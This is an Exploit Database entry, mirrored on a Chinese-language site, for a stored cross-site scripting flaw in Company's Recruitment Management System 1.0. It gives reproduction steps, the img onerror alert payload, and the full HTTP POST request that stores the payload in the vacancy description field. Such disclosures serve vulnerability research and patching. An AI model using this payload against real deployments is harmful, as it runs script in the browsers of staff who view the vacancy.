Company’s Recruitment Management System 1.0 – ‘description’ Stored Cross-Site Scripting (XSS)

• Exploit Database
• 89 阅读

• 作者： Aniket Deshmane
  日期： 2021-10-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50424/

• # Exploit Title: Company's Recruitment Management System 1.0 -'description' Stored Cross-Site Scripting (XSS)
  # Date: 18-10-2021
  # Exploit Author: Aniket Anil Deshmane
  # Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
  # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
  # Version: 1
  # Tested on: Windows 10,XAMPP
  
  Step to reproduce:-
  1)Login with staff account & Navigate toVacancies tab.
  
  2)Click on add new vacancies .Put any random informationon other field except description & go to the description window .
  
  3)In the description fieldselect insertlink .
  
  5) In Text to display the field add the following payload .
  
  "><img src=x onerror=alert(1)>
  
  *6)Click on save & you are done.It's gonna be triggered when some one open
  vacancies details*
  
  Request:-
  
  POST /employment_application/Actions.php?a=save_vacancy HTTP/1.1
  Host: 127.0.0.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0)
  Gecko/20100101 Firefox/93.0
  Accept: application/json, text/javascript, */*; q=0.01
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  X-Requested-With: XMLHttpRequest
  Content-Type: multipart/form-data;
  boundary=---------------------------156186133432167175201476666002
  Content-Length: 1012
  Origin: http://127.0.0.1
  DNT: 1
  Connection: close
  Referer: http://127.0.0.1/employment_application/admin/?page=vacancies
  Cookie: PHPSESSID=ah0lpri38n5c4ke3idhbkaabfa
  Sec-Fetch-Dest: empty
  Sec-Fetch-Mode: cors
  Sec-Fetch-Site: same-origin
  
  -----------------------------156186133432167175201476666002
  Content-Disposition: form-data; name="id"
  
  
  -----------------------------156186133432167175201476666002
  Content-Disposition: form-data; name="title"
  
  Test1ee
  -----------------------------156186133432167175201476666002
  Content-Disposition: form-data; name="designation_id"
  
  4
  -----------------------------156186133432167175201476666002
  Content-Disposition: form-data; name="slots"
  
  1
  -----------------------------156186133432167175201476666002
  Content-Disposition: form-data; name="status"
  
  1
  -----------------------------156186133432167175201476666002
  Content-Disposition: form-data; name="description"
  
  <p><br><a href="http://google.com" target="_blank">"><img src="https://www.exploit-db.com/exploits/50424/x"
  onerror="alert(1)"></a></p>
  -----------------------------156186133432167175201476666002
  Content-Disposition: form-data; name="files"; filename=""
  Content-Type: application/octet-stream
  
  
  -----------------------------156186133432167175201476666002--
  

  Python

  Copy